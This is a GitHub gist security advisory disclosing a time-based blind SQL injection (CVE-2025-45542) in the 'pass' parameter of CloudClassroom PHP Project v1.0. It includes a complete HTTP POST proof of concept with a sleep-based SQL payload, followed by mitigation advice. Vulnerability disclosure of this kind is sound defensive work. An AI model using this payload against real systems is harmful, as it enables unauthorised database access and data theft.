Skip to content

Instantly share code, notes, and snippets.

@sanjay70023

sanjay70023/CVE-2025-45542-SQLi-Sanjay-Singh.md

Last active May 30, 2025 17:06
Show Gist options
  • Save sanjay70023/63e9c32e49a0760eaa6b9e2a8ba8c966 to your computer and use it in GitHub Desktop.
Save sanjay70023/63e9c32e49a0760eaa6b9e2a8ba8c966 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
CVE-2025-45542-SQLi-Sanjay-Singh.md

πŸ”’ Security Advisory: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0

CVE ID: CVE-2025-45542
Advisory Publication Date: [To be updated upon release]
Vulnerability Type: SQL Injection (Time-Based Blind)
Severity: High
Attack Vector: Remote
Status: Unpatched as of disclosure
Discoverer: Sanjay Singh

πŸ“˜ Summary

A time-based blind SQL injection vulnerability has been discovered in the registrationform endpoint of the CloudClassroom PHP Project v1.0. The pass parameter does not validate or sanitize input correctly, allowing attackers to execute arbitrary SQL logic. This can lead to data exfiltration, authentication bypass, or even remote code execution depending on the database setup.

🎯 Affected Product

  • Vendor: CloudClassroom PHP Project
  • Version: v1.0
  • Component: registrationform endpoint
  • Vulnerable Parameter: pass (in HTTP POST request)

πŸ§ͺ Proof of Concept (PoC)

HTTP Request:

POST /CloudClassroom-PHP-Project-master/registrationform HTTP/1.1
Host: localhost
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/CloudClassroom-PHP-Project-master/
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=ct1bl32iroa3t76clsj3osvjqs
Content-Length: 225 
addrs=3137%20Laguna%20Street&course=1&dob=1967/1/1&email=testing%40example.com&
faname=pHqghUme&fname=pHqghUme&gender=Female&lname=pHqghUme&
pass=u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z&
phno=94102&sub

Observation:

  • Response is delayed by 6 seconds, confirming the injection point.

🎯 Impact

  • SQL Query Injection
  • User Data Exfiltration
  • Authentication Bypass
  • Possible Remote Code Execution

πŸ›‘οΈ Mitigation

βœ… Use Prepared Statements:

$stmt = $conn->prepare("INSERT INTO users (pass) VALUES (?)");
$stmt->bind_param("s", $password);
$stmt->execute();

βœ… Sanitize Inputs:

  • Use htmlspecialchars() and mysqli_real_escape_string() where applicable.

βœ… Deploy a WAF:

  • Detect and block SQLi payloads.

βœ… Limit DB Permissions:

  • Follow the principle of least privilege for database users.

πŸ“š References

πŸ™ Acknowledgement

Reported by: Sanjay Singh

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment